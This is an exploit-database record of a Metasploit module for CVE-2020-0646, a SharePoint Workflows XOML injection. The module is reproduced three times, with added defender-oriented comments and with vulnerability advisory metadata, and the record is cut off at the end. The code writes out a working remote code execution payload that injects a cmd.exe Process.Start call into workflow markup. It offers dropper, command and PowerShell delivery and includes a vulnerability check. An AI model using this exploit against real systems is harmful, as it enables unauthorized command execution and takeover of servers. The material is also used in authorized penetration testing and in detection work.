ID EDB-ID:48275 Type exploitdb Reporter Exploit-DB Modified 2020-03-31T00:00:00
Description
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# Metasploit remote exploit module for CVE-2020-0646 (SharePoint Workflows
# XOML injection).
#
# The module sends an authenticated SOAP request to the SharePoint
# WebPartPages web service (`_vti_bin/webpartpages.asmx`) that calls
# ValidateWorkflowMarkupAndCreateSupportObjects with workflow markup whose
# InterfaceType attribute carries extra code instead of a plain type name.
#
# Points a defender can take from the code below:
# * valid credentials are required (USERNAME and PASSWORD are mandatory options);
# * the request is a POST with content type `text/xml; charset=utf-8`;
# * the module itself declares on-disk artifacts and log entries as side effects;
# * a patched server answers with a compiler error containing
#   "is not a valid language-independent type name".
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::AutoCheck

  # Registers the module metadata (name, references, targets, defaults) and
  # the user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SharePoint Workflows XOML Injection',
      'Description' => %q{
This module exploits a vulnerability within SharePoint and its .NET backend
that allows an attacker to execute commands using specially crafted XOML data
sent to SharePoint via the Workflows functionality.
},
      'Author' => [
        'Spencer McIntyre',
        'Soroush Dalili'
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2020-0646'],
        ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
      ],
      'Platform' => 'win',
      # Three delivery types; #exploit dispatches on the 'Type' value.
      # The 'Space' of the command target is also reused by the dropper
      # target as the maximum command-stager line length.
      'Targets' => [
        [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
        [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
        [ 'Windows Powershell',
          'Arch' => [ARCH_X86, ARCH_X64],
          'Type' => :windows_powershell
        ]
      ],
      # HTTPS on port 443 unless the operator overrides it.
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true
      },
      'DefaultTarget' => 0,
      'DisclosureDate' => '2020-03-02',
      # Self-declared impact: artifacts are left on disk and indicators
      # appear in logs, which is what incident responders should look for.
      'Notes' =>
      {
        'Stability' => [CRASH_SAFE,],
        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
        'Reliability' => [REPEATABLE_SESSION],
      },
      'Privileged' => true
    ))

    # All four options are marked required. USERNAME and PASSWORD are sent
    # with every request in #execute_command.
    # NOTE(review): DOMAIN is not referenced anywhere in this file;
    # presumably the HTTP client mixin reads it from the datastore - confirm.
    register_options([
      OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
      OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
      OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
    ])
  end

  # Classifies the target by sending the workflow-validation request with an
  # `echo <random string>` command and inspecting the compiler errors that
  # come back in the response.
  #
  # The verdict is derived only from the error text: any compiler error that
  # does not match the post-patch message is reported as Vulnerable, so the
  # result is an inference, not proof that the command ran.
  #
  # @return [CheckCode] Unknown when there is no HTTP 200 or no compiler
  #   errors, Safe when the post-patch message is present, Vulnerable otherwise
  def check
    res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
    return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200

    compiler_errors = extract_compiler_errors(res)
    # NOTE(review): extract_compiler_errors can return nil; in that case
    # `compiler_errors&.length` is nil and `nil > 0` raises NoMethodError
    # instead of returning Unknown.
    return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0

    # A patched server rejects the crafted type name with this specific
    # compiler error message.
    return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/

    CheckCode::Vulnerable
  end

  # Pulls the compiler error texts out of a web service response.
  #
  # The text of the ValidateWorkflowMarkupAndCreateSupportObjectsResult element
  # is parsed as a second XML document, from which the Text attribute of every
  # CompilerError node is selected.
  #
  # @param res [Object, nil] the HTTP response returned by #execute_command
  # @return [Object, nil] the matching attribute nodes, or nil when the
  #   response is missing, is not an HTTP 200, or has an empty result element
  def extract_compiler_errors(res)
    return nil unless res&.code == 200

    xml_doc = res.get_xml_document
    # local-name() matches the element regardless of its XML namespace.
    result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
    return nil if result.length == 0

    xml_result = Nokogiri::XML(result)
    xml_result.xpath('//CompilerError/@Text')
  end

  # Entry point invoked by the framework; delivers the payload according to
  # the selected target type.
  def exploit
    # Calling super lets the AutoCheck mixin run #check before delivery.
    super

    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :windows_dropper
      # The dropper target has no 'Space' of its own, so the limit declared
      # on the 'Windows Command' target is used as the stager line length.
      # The block parameter shadows the outer `target` only inside the block.
      cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
      execute_cmdstager({linemax: cmd_target.opts['Space']})
    when :windows_powershell
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  # Encodes a command string so it can be embedded in the request markup.
  #
  # Characters in the allow-list (letters, digits, space and $ : ; - . = [ ] { } ( ))
  # pass through unchanged; every other character is replaced by a
  # backslash-u escape with four hex digits.
  # NOTE(review): the escape is built from the first byte of the matched
  # character only (`unpack('C*')[0]`), so it is faithful for single-byte
  # input only.
  #
  # @param cmd [String] the command text to encode
  # @return [String] the encoded command
  def escape_command(cmd)
    cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
  end

  # Builds the SOAP request that carries the command and sends it to the
  # target with the configured credentials.
  #
  # The escaped command is interpolated into the InterfaceType attribute of
  # the CallExternalMethodActivity element. For detection purposes: a type
  # name in that attribute which contains code punctuation or a reference to
  # System.Diagnostics.Process is not legitimate workflow markup.
  #
  # @param cmd [String] command text; escaped with #escape_command before use
  # @param opts [Hash] not used in this method body
  # @return [Object, nil] the HTTP response; an error is printed when it is
  #   missing or its code is not 200
  def execute_command(cmd, opts = {})
    # The heredoc body is sent as-is, so it is left flush with the margin.
    xoml_data = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
<workflowMarkupText>
<![CDATA[
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
<CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
</SequentialWorkflowActivity>
]]>
</workflowMarkupText>
<rulesText></rulesText>
<configBlob></configBlob>
<flag>2</flag>
</ValidateWorkflowMarkupAndCreateSupportObjects>
</soap:Body>
</soap:Envelope>
    EOS

    # The endpoint path is TARGETURI + /_vti_bin/webpartpages.asmx.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
      'ctype' => 'text/xml; charset=utf-8',
      'data' => xoml_data,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })

    # `res&.code` is nil when no response was received, so that case is
    # reported here as well.
    unless res&.code == 200
      print_error('Non-200 HTTP response received while trying to execute the command')
    end

    res
  end
end
{"id": "EDB-ID:48275", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SharePoint Workflows - XOML Injection (Metasploit)", "description": "", "published": "2020-03-31T00:00:00", "modified": "2020-03-31T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.exploit-db.com/exploits/48275", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2020-0646"], "lastseen": "2020-03-31T15:56:09", "viewCount": 133, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE"]}, {"type": "cve", "idList": ["CVE-2020-0646"]}, {"type": "symantec", "idList": ["SMNTC-111386"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156930"]}, {"type": "zdt", "idList": ["1337DAY-ID-34152"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0646"]}, {"type": "kitploit", "idList": ["KITPLOIT:4480301396595295532"]}, {"type": "mskb", "idList": ["KB4534977", "KB4532935", "KB4534979", "KB4532933", "KB4534978", "KB4532934", "KB4535105", "KB4535101", "KB4532938", "KB4534976"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534283.NASL", "SMB_NT_MS20_JAN_4534303.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SMB_NT_MS20_JAN_DOTNET.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534297.NASL", "SMB_NT_MS20_JAN_4534310.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815895", "OPENVAS:1361412562310815897", "OPENVAS:1361412562310816553", "OPENVAS:1361412562310815894", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815740", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310816552", "OPENVAS:1361412562310815898"]}, {"type": "kaspersky", "idList": ["KLA11634"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF"]}], "modified": "2020-03-31T15:56:09", "rev": 2}, "score": {"value": 4.7, "vector": "NONE", 
"modified": "2020-03-31T15:56:09", "rev": 2}, "vulnersScore": 4.7}, "sourceHref": "https://www.exploit-db.com/download/48275", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::AutoCheck\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SharePoint Workflows XOML Injection',\r\n 'Description' => %q{\r\n This module exploits a vulnerability within SharePoint and its .NET backend\r\n that allows an attacker to execute commands using specially crafted XOML data\r\n sent to SharePoint via the Workflows functionality.\r\n },\r\n 'Author' => [\r\n 'Spencer McIntyre',\r\n 'Soroush Dalili'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0646'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' => [\r\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\r\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\r\n [ 'Windows Powershell',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :windows_powershell\r\n ]\r\n ],\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => '2020-03-02',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [CRASH_SAFE,],\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n },\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\r\n OptString.new('DOMAIN', [ true, 'The 
domain to use for Windows authentication', 'WORKGROUP' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n end\r\n\r\n def check\r\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\r\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\r\n\r\n compiler_errors = extract_compiler_errors(res)\r\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\r\n\r\n # once patched you get a specific compiler error message about the type name\r\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def extract_compiler_errors(res)\r\n return nil unless res&.code == 200\r\n\r\n xml_doc = res.get_xml_document\r\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\r\n return nil if result.length == 0\r\n\r\n xml_result = Nokogiri::XML(result)\r\n xml_result.xpath('//CompilerError/@Text')\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n case target['Type']\r\n when :windows_command\r\n execute_command(payload.encoded)\r\n when :windows_dropper\r\n cmd_target = targets.select {|target| target['Type'] == :windows_command}.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space']})\r\n when :windows_powershell\r\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\r\n end\r\n end\r\n\r\n def escape_command(cmd)\r\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\r\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n xoml_data = 
<<-EOS\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\r\n <workflowMarkupText>\r\n <![CDATA[\r\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\r\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\r\n </SequentialWorkflowActivity>\r\n ]]>\r\n </workflowMarkupText>\r\n <rulesText></rulesText>\r\n <configBlob></configBlob>\r\n <flag>2</flag>\r\n </ValidateWorkflowMarkupAndCreateSupportObjects>\r\n </soap:Body>\r\n</soap:Envelope>\r\n EOS\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => xoml_data,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n unless res&.code == 200\r\n print_error('Non-200 HTTP response received while trying to execute the command')\r\n end\r\n\r\n res\r\n end\r\nend", "osvdbidlist": []}
{"attackerkb": [{"lastseen": "2020-11-18T06:45:44", "bulletinFamily": "info", "cvelist": ["CVE-2020-0646"], "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka \u2018.NET Framework Remote Code Execution Injection Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 20, 2020 1:31pm UTC reported:\n\nThe SharePoint WorkFlow component is affected by a vulnerability within .NET which can be abused to run arbitrary code when compiling XOML files. An authenticated user would need to issue an HTTP request with crafted XOML-formatted data (for which there are public examples). The vulnerability was patched for on-premises installations of SharePoint on January 2020.\n\nA correct crafted XOML request will result in extra C# code being written to a temporary file on disk as part of the exploitation process. This is how an OS command is then executed.\n\nBoth patched and unpatched systems will return compiler error information in the XML response to the HTTP request. A patched system will have an error stating `\"Compilation failed. The type name: ... is not a valid language-independent type name.\"`. Malformed requests will include relevant information in the compiler error text, which is usually a character escaping issue. 
For best results escape all characters that are non-alphanumeric as unicode like `\\u####`.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-30T00:00:00", "published": "2020-01-14T00:00:00", "id": "AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "href": "https://attackerkb.com/topics/79GOZOJWWk/cve-2020-0646", "type": "attackerkb", "title": "CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:55:45", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka '.NET Framework Remote Code Execution Injection Vulnerability'.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T23:15:00", "title": "CVE-2020-0646", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T17:15:00", "cpe": ["cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:4.8", 
"cpe:/a:microsoft:.net_framework:4.7", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.7.2", "cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.7.1", "cpe:/a:microsoft:.net_framework:3.0", "cpe:/a:microsoft:.net_framework:4.6"], "id": "CVE-2020-0646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2020-01-15T00:26:21", "bulletinFamily": "software", "cvelist": ["CVE-2020-0646"], "description": "### Description\n\nMicrosoft .NET Framework is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2020-01-14T00:00:00", "published": "2020-01-14T00:00:00", "id": "SMNTC-111386", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111386", "type": "symantec", "title": "Microsoft .NET Framework CVE-2020-0646 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-03-29T15:35:52", "description": "", "published": "2020-03-26T00:00:00", "type": "packetstorm", "title": "SharePoint Workflows XOML Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "PACKETSTORM:156930", "href": "https://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html", "sourceData": "`# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SharePoint Workflows XOML Injection', \n'Description' => %q{ \nThis module exploits a vulnerability within SharePoint and its .NET backend \nthat allows an attacker to execute commands using specially crafted XOML data \nsent to SharePoint via the Workflows functionality. 
\n}, \n'Author' => [ \n'Spencer McIntyre', \n'Soroush Dalili' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0646'], \n['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/'] \n], \n'Platform' => 'win', \n'Targets' => [ \n[ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n[ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ], \n[ 'Windows Powershell', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :windows_powershell \n] \n], \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-02', \n'Notes' => \n{ \n'Stability' => [CRASH_SAFE,], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION], \n}, \n'Privileged' => true \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]), \nOptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \nend \n \ndef check \nres = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\") \nreturn CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200 \n \ncompiler_errors = extract_compiler_errors(res) \nreturn CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0 \n \n# once patched you get a specific compiler error message about the type name \nreturn CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/ \n \nCheckCode::Vulnerable \nend \n \ndef extract_compiler_errors(res) \nreturn nil unless res&.code == 200 \n \nxml_doc = res.get_xml_document \nresult = 
xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text \nreturn nil if result.length == 0 \n \nxml_result = Nokogiri::XML(result) \nxml_result.xpath('//CompilerError/@Text') \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \ncase target['Type'] \nwhen :windows_command \nexecute_command(payload.encoded) \nwhen :windows_dropper \ncmd_target = targets.select {|target| target['Type'] == :windows_command}.first \nexecute_cmdstager({linemax: cmd_target.opts['Space']}) \nwhen :windows_powershell \nexecute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) \nend \nend \n \ndef escape_command(cmd) \n# a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode \ncmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] } \nend \n \ndef execute_command(cmd, opts = {}) \nxoml_data = <<-EOS \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\"> \n<workflowMarkupText> \n<![CDATA[ \n<SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\"> \n<CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c #{escape_command(cmd)}\");private/**/void/**/foobar(){//' /> \n</SequentialWorkflowActivity> \n]]> \n</workflowMarkupText> \n<rulesText></rulesText> \n<configBlob></configBlob> \n<flag>2</flag> \n</ValidateWorkflowMarkupAndCreateSupportObjects> 
\n</soap:Body> \n</soap:Envelope> \nEOS \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'), \n'ctype' => 'text/xml; charset=utf-8', \n'data' => xoml_data, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \n \nunless res&.code == 200 \nprint_error('Non-200 HTTP response received while trying to execute the command') \nend \n \nres \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156930/sharepoint_workflows_xoml.rb.txt"}], "mscve": [{"lastseen": "2020-08-07T11:48:22", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646"], "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nTo exploit the vulnerability, an attacker would need to pass specific input to an application utilizing susceptible .Net methods.\n\nThe security update addresses the vulnerability by correcting how the Microsoft .NET Framework validates input.\n", "edition": 3, "modified": "2020-05-12T07:00:00", "id": "MS:CVE-2020-0646", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646", "published": "2020-05-12T07:00:00", "title": ".NET Framework Remote Code Execution Injection Vulnerability", "type": "mscve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-03-26T19:11:29", "description": "This Metasploit module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.", "edition": 1, "published": "2020-03-26T00:00:00", "title": "SharePoint Workflows XOML Injection Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0646"], "modified": "2020-03-26T00:00:00", "id": "1337DAY-ID-34152", "href": "https://0day.today/exploit/description/34152", "sourceData": "# This module requires 